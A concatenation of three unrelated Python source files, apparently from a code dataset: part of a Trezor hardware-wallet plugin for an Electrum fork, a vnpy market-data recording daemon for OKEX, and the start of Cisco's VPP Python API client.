raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Sumcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
runDataRecording.py
|
# encoding: UTF-8
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import okcoinGateway
from vnpy.trader.app import dataRecorder
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-' * 30)
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
# le.addConsoleHandler()
le.info(u'启动行情记录运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(okcoinGateway)
me.addApp(dataRecorder)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
le.info(u'注册日志事件监听')
me.connect('OKEX')
le.info(u'连接OKEX接口')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动行情记录守护父进程')
DAY_START = time(8, 57) # 日盘启动和停止时间
DAY_END = time(15, 18)
NIGHT_START = time(20, 57) # 夜盘启动和停止时间
NIGHT_END = time(2, 33)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = True
# # 判断当前处于的时间段
# if ((currentTime >= DAY_START and currentTime <= DAY_END) or
# (currentTime >= NIGHT_START) or
# (currentTime <= NIGHT_END)):
# recording = True
#
# # 过滤周末时间段:周六全天,周五夜盘,周日日盘
# if ((datetime.today().weekday() == 6) or
# (datetime.today().weekday() == 5 and currentTime > NIGHT_END) or
# (datetime.today().weekday() == 0 and currentTime < DAY_START)):
# recording = False
# 记录时间则需要启动子进程
if p is None or not p.is_alive():
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# 非记录时间则退出子进程
# if not recording and p is not None:
# le.info(u'关闭子进程')
# p.terminate()
# p.join()
# p = None
# le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
#runChildProcess()
runParentProcess()
|
vpp_papi.py
|
#!/usr/bin/env python
#
# Copyright (c) 2016 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from __future__ import absolute_import
import ctypes
import sys
import multiprocessing as mp
import os
import logging
import functools
import json
import threading
import fnmatch
import weakref
import atexit
from . vpp_serializer import VPPType, VPPEnumType, VPPUnionType
from . vpp_serializer import VPPMessage, vpp_get_type, VPPTypeAlias
if sys.version[0] == '2':
import Queue as queue
else:
import queue as queue
__all__ = ('FuncWrapper', 'VPP', 'VppApiDynamicMethodHolder',
'VppEnum', 'VppEnumType',
'VPPIOError', 'VPPRuntimeError', 'VPPValueError',
'VPPApiClient', )
def metaclass(metaclass):
@functools.wraps(metaclass)
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class VppEnumType(type):
def __getattr__(cls, name):
t = vpp_get_type(name)
return t.enum
@metaclass(VppEnumType)
class VppEnum(object):
pass
def vpp_atexit(vpp_weakref):
"""Clean up VPP connection on shutdown."""
vpp_instance = vpp_weakref()
if vpp_instance and vpp_instance.transport.connected:
vpp_instance.logger.debug('Cleaning up VPP on exit')
vpp_instance.disconnect()
if sys.version[0] == '2':
def vpp_iterator(d):
return d.iteritems()
else:
def vpp_iterator(d):
return d.items()
class VppApiDynamicMethodHolder(object):
pass
class FuncWrapper(object):
def __init__(self, func):
self._func = func
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, **kwargs):
return self._func(**kwargs)
def __repr__(self):
return '<FuncWrapper(func=<%s(%s)>)>' % (self.__name__, self.__doc__)
class VPPApiError(Exception):
pass
class VPPNotImplementedError(NotImplementedError):
pass
class VPPIOError(IOError):
pass
class VPPRuntimeError(RuntimeError):
pass
class VPPValueError(ValueError):
pass
class VPPApiJSONFiles(object):
@classmethod
def find_api_dir(cls, dirs):
"""Attempt to find the best directory in which API definition
files may reside. If the value VPP_API_DIR exists in the environment
then it is first on the search list. If we're inside a recognized
location in a VPP source tree (src/scripts and src/vpp-api/python)
then entries from there to the likely locations in build-root are
added. Finally the location used by system packages is added.
:returns: A single directory name, or None if no such directory
could be found.
"""
# perhaps we're in the 'src/scripts' or 'src/vpp-api/python' dir;
# in which case, plot a course to likely places in the src tree
import __main__ as main
if hasattr(main, '__file__'):
# get the path of the calling script
localdir = os.path.dirname(os.path.realpath(main.__file__))
else:
# use cwd if there is no calling script
localdir = os.getcwd()
localdir_s = localdir.split(os.path.sep)
def dmatch(dir):
"""Match dir against right-hand components of the script dir"""
d = dir.split('/') # param 'dir' assumes a / separator
length = len(d)
return len(localdir_s) > length and localdir_s[-length:] == d
def sdir(srcdir, variant):
"""Build a path from srcdir to the staged API files of
'variant' (typically '' or '_debug')"""
# Since 'core' and 'plugin' files are staged
# in separate directories, we target the parent dir.
return os.path.sep.join((
srcdir,
'build-root',
'install-vpp%s-native' % variant,
'vpp',
'share',
'vpp',
'api',
))
srcdir = None
if dmatch('src/scripts'):
srcdir = os.path.sep.join(localdir_s[:-2])
elif dmatch('src/vpp-api/python'):
srcdir = os.path.sep.join(localdir_s[:-3])
elif dmatch('test'):
# we're apparently running tests
srcdir = os.path.sep.join(localdir_s[:-1])
if srcdir:
# we're in the source tree, try both the debug and release
# variants.
dirs.append(sdir(srcdir, '_debug'))
dirs.append(sdir(srcdir, ''))
# Test for staged copies of the scripts
# For these, since we explicitly know if we're running a debug versus
# release variant, target only the relevant directory
if dmatch('build-root/install-vpp_debug-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, '_debug'))
if dmatch('build-root/install-vpp-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, ''))
# finally, try the location system packages typically install into
dirs.append(os.path.sep.join(('', 'usr', 'share', 'vpp', 'api')))
# check the directories for existence; first one wins
for dir in dirs:
if os.path.isdir(dir):
return dir
return None
@classmethod
def find_api_files(cls, api_dir=None, patterns='*'):
"""Find API definition files from the given directory tree with the
given pattern. If no directory is given then find_api_dir() is used
to locate one. If no pattern is given then all definition files found
in the directory tree are used.
:param api_dir: A directory tree in which to locate API definition
files; subdirectories are descended into.
If this is None then find_api_dir() is called to discover it.
:param patterns: A list of patterns to use in each visited directory
when looking for files.
This can be a list/tuple object or a comma-separated string of
patterns. Each value in the list will have leading/trialing
whitespace stripped.
The pattern specifies the first part of the filename, '.api.json'
is appended.
The results are de-duplicated, thus overlapping patterns are fine.
If this is None it defaults to '*' meaning "all API files".
:returns: A list of file paths for the API files found.
"""
if api_dir is None:
api_dir = cls.find_api_dir([])
if api_dir is None:
raise VPPApiError("api_dir cannot be located")
if isinstance(patterns, list) or isinstance(patterns, tuple):
patterns = [p.strip() + '.api.json' for p in patterns]
else:
patterns = [p.strip() + '.api.json' for p in patterns.split(",")]
api_files = []
for root, dirnames, files in os.walk(api_dir):
# iterate all given patterns and de-dup the result
files = set(sum([fnmatch.filter(files, p) for p in patterns], []))
for filename in files:
api_files.append(os.path.join(root, filename))
return api_files
@classmethod
def process_json_file(self, apidef_file):
api = json.load(apidef_file)
types = {}
services = {}
messages = {}
for t in api['enums']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'enum', 'data': t}
for t in api['unions']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'union', 'data': t}
for t in api['types']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'type', 'data': t}
for t, v in api['aliases'].items():
types['vl_api_' + t + '_t'] = {'type': 'alias', 'data': v}
services.update(api['services'])
i = 0
while True:
unresolved = {}
for k, v in types.items():
t = v['data']
if not vpp_get_type(k):
if v['type'] == 'enum':
try:
VPPEnumType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'union':
try:
VPPUnionType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'type':
try:
VPPType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'alias':
try:
VPPTypeAlias(k, t)
except ValueError:
unresolved[k] = v
if len(unresolved) == 0:
break
if i > 3:
raise VPPValueError('Unresolved type definitions {}'
.format(unresolved))
types = unresolved
i += 1
for m in api['messages']:
try:
messages[m[0]] = VPPMessage(m[0], m[1:])
except VPPNotImplementedError:
### OLE FIXME
self.logger.error('Not implemented error for {}'.format(m[0]))
return messages, services
class VPPApiClient(object):
"""VPP interface.
This class provides the APIs to VPP. The APIs are loaded
from provided .api.json files and makes functions accordingly.
These functions are documented in the VPP .api files, as they
are dynamically created.
Additionally, VPP can send callback messages; this class
provides a means to register a callback function to receive
these messages in a background thread.
"""
apidir = None
VPPApiError = VPPApiError
VPPRuntimeError = VPPRuntimeError
VPPValueError = VPPValueError
VPPNotImplementedError = VPPNotImplementedError
VPPIOError = VPPIOError
def __init__(self, apifiles=None, testmode=False, async_thread=True,
logger=None, loglevel=None,
read_timeout=5, use_socket=False,
server_address='/run/vpp/api.sock'):
"""Create a VPP API object.
apifiles is a list of files containing API
descriptions that will be loaded - methods will be
dynamically created reflecting these APIs. If not
provided this will load the API files from VPP's
default install location.
logger, if supplied, is the logging logger object to log to.
loglevel, if supplied, is the log level this logger is set
to report at (from the loglevels in the logging module).
"""
if logger is None:
logger = logging.getLogger(
"{}.{}".format(__name__, self.__class__.__name__))
if loglevel is not None:
logger.setLevel(loglevel)
self.logger = logger
self.messages = {}
self.services = {}
self.id_names = []
self.id_msgdef = []
self.header = VPPType('header', [['u16', 'msgid'],
['u32', 'client_index']])
self.apifiles = []
self.event_callback = None
self.message_queue = queue.Queue()
self.read_timeout = read_timeout
self.async_thread = async_thread
self.event_thread = None
self.testmode = testmode
self.use_socket = use_socket
self.server_address = server_address
self._apifiles = apifiles
if use_socket:
from . vpp_transport_socket import VppTransport
else:
from . vpp_transport_shmem import VppTransport
if not apifiles:
# Pick up API definitions from default directory
try:
apifiles = VPPApiJSONFiles.find_api_files(self.apidir)
except RuntimeError:
# In test mode we don't care that we can't find the API files
if testmode:
apifiles = []
else:
raise VPPRuntimeError
for file in apifiles:
with open(file) as apidef_file:
m, s = VPPApiJSONFiles.process_json_file(apidef_file)
self.messages.update(m)
self.services.update(s)
self.apifiles = apifiles
# Basic sanity check
if len(self.messages) == 0 and not testmode:
raise VPPValueError(1, 'Missing JSON message definitions')
self.transport = VppTransport(self, read_timeout=read_timeout,
server_address=server_address)
# Make sure we allow VPP to clean up the message rings.
atexit.register(vpp_atexit, weakref.ref(self))
def get_function(self, name):
return getattr(self._api, name)
class ContextId(object):
"""Multiprocessing-safe provider of unique context IDs."""
def __init__(self):
self.context = mp.Value(ctypes.c_uint, 0)
self.lock = mp.Lock()
def __call__(self):
"""Get a new unique (or, at least, not recently used) context."""
with self.lock:
self.context.value += 1
return self.context.value
get_context = ContextId()
def get_type(self, name):
return vpp_get_type(name)
@property
def api(self):
if not hasattr(self, "_api"):
raise VPPApiError("Not connected, api definitions not available")
return self._api
def make_function(self, msg, i, multipart, do_async):
if (do_async):
def f(**kwargs):
return self._call_vpp_async(i, msg, **kwargs)
else:
def f(**kwargs):
return self._call_vpp(i, msg, multipart, **kwargs)
f.__name__ = str(msg.name)
f.__doc__ = ", ".join(["%s %s" %
(msg.fieldtypes[j], k)
for j, k in enumerate(msg.fields)])
f.msg = msg
return f
def _register_functions(self, do_async=False):
self.id_names = [None] * (self.vpp_dictionary_maxid + 1)
self.id_msgdef = [None] * (self.vpp_dictionary_maxid + 1)
self._api = VppApiDynamicMethodHolder()
for name, msg in vpp_iterator(self.messages):
n = name + '_' + msg.crc[2:]
i = self.transport.get_msg_index(n)
if i > 0:
self.id_msgdef[i] = msg
self.id_names[i] = name
# Create function for client side messages.
if name in self.services:
if 'stream' in self.services[name] and \
self.services[name]['stream']:
multipart = True
else:
multipart = False
f = self.make_function(msg, i, multipart, do_async)
setattr(self._api, name, FuncWrapper(f))
else:
self.logger.debug(
'No such message type or failed CRC checksum: %s', n)
def connect_internal(self, name, msg_handler, chroot_prefix, rx_qlen,
do_async):
pfx = chroot_prefix.encode('utf-8') if chroot_prefix else None
rv = self.transport.connect(name, pfx,
msg_handler, rx_qlen)
if rv != 0:
raise VPPIOError(2, 'Connect failed')
self.vpp_dictionary_maxid = self.transport.msg_table_max_index()
self._register_functions(do_async=do_async)
# Initialise control ping
crc = self.messages['control_ping'].crc
self.control_ping_index = self.transport.get_msg_index(
('control_ping' + '_' + crc[2:]))
self.control_ping_msgdef = self.messages['control_ping']
if self.async_thread:
self.event_thread = threading.Thread(
target=self.thread_msg_handler)
self.event_thread.daemon = True
self.event_thread.start()
else:
self.event_thread = None
return rv
def connect(self, name, chroot_prefix=None, do_async=False, rx_qlen=32):
"""Attach to VPP.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
do_async - if true, messages are sent without waiting for a reply
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
msg_handler = self.transport.get_callback(do_async)
return self.connect_internal(name, msg_handler, chroot_prefix, rx_qlen,
do_async)
def connect_sync(self, name, chroot_prefix=None, rx_qlen=32):
"""Attach to VPP in synchronous mode. Application must poll for events.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
return self.connect_internal(name, None, chroot_prefix, rx_qlen,
do_async=False)
def disconnect(self):
"""Detach from VPP."""
rv = self.transport.disconnect()
if self.event_thread is not None:
self.message_queue.put("terminate event thread")
return rv
def msg_handler_sync(self, msg):
"""Process an incoming message from VPP in sync mode.
The message may be a reply or it may be an async notification.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
# If we have a context, then use the context to find any
# request waiting for a reply
context = 0
if hasattr(r, 'context') and r.context > 0:
context = r.context
if context == 0:
# No context -> async notification that we feed to the callback
self.message_queue.put_nowait(r)
else:
raise VPPIOError(2, 'RPC reply message received in event handler')
def has_context(self, msg):
if len(msg) < 10:
return False
header = VPPType('header_with_context', [['u16', 'msgid'],
['u32', 'client_index'],
['u32', 'context']])
(i, ci, context), size = header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if 'context' in msgobj.field_by_name and context >= 0:
return True
return False
def decode_incoming_msg(self, msg, no_type_conversion=False):
if not msg:
self.logger.warning('vpp_api.read failed')
return
(i, ci), size = self.header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if not msgobj:
raise VPPIOError(2, 'Reply message undefined')
r, size = msgobj.unpack(msg, ntc=no_type_conversion)
return r
def msg_handler_async(self, msg):
"""Process a message from VPP in async mode.
In async mode, all messages are returned to the callback.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def _control_ping(self, context):
"""Send a ping command."""
self._call_vpp_async(self.control_ping_index,
self.control_ping_msgdef,
context=context)
def validate_args(self, msg, kwargs):
d = set(kwargs.keys()) - set(msg.field_by_name.keys())
if d:
raise VPPValueError('Invalid argument {} to {}'
.format(list(d), msg.name))
def _call_vpp(self, i, msgdef, multipart, **kwargs):
"""Given a message, send the message and await a reply.
msgdef - the message packing definition
i - the message type index
multipart - True if the message returns multiple
messages in return.
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
The return value is the message or message array containing
the response. It will raise an IOError exception if there was
no response within the timeout window.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
kwargs['_vl_msg_id'] = i
no_type_conversion = kwargs.pop('_no_type_conversion', False)
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
pass
self.validate_args(msgdef, kwargs)
s = 'Calling {}({})'.format(msgdef.name,
','.join(['{!r}:{!r}'.format(k, v) for k, v in kwargs.items()]))
self.logger.debug(s)
b = msgdef.pack(kwargs)
self.transport.suspend()
self.transport.write(b)
if multipart:
# Send a ping after the request - we use its response
# to detect that we have seen all results.
self._control_ping(context)
# Block until we get a reply.
rl = []
while (True):
msg = self.transport.read()
if not msg:
raise VPPIOError(2, 'VPP API client: read failed')
r = self.decode_incoming_msg(msg, no_type_conversion)
msgname = type(r).__name__
if context not in r or r.context == 0 or context != r.context:
# Message being queued
self.message_queue.put_nowait(r)
continue
if not multipart:
rl = r
break
if msgname == 'control_ping_reply':
break
rl.append(r)
self.transport.resume()
self.logger.debug('Return from {!r}'.format(r))
return rl
def _call_vpp_async(self, i, msg, **kwargs):
"""Given a message, send the message and return the context.
msgdef - the message packing definition
i - the message type index
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
The reply message(s) will be delivered later to the registered callback.
The returned context will help with assigning which call
the reply belongs to.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
kwargs['client_index'] = 0
kwargs['_vl_msg_id'] = i
b = msg.pack(kwargs)
self.transport.write(b)
return context
def register_event_callback(self, callback):
"""Register a callback for async messages.
This will be called for async notifications in sync mode,
and all messages in async mode. In sync mode, replies to
requests will not come here.
callback is a fn(msg_type_name, msg_type) that will be
called when a message comes in. While this function is
executing, note that (a) you are in a background thread and
may wish to use threading.Lock to protect your datastructures,
and (b) message processing from VPP will stop (so if you take
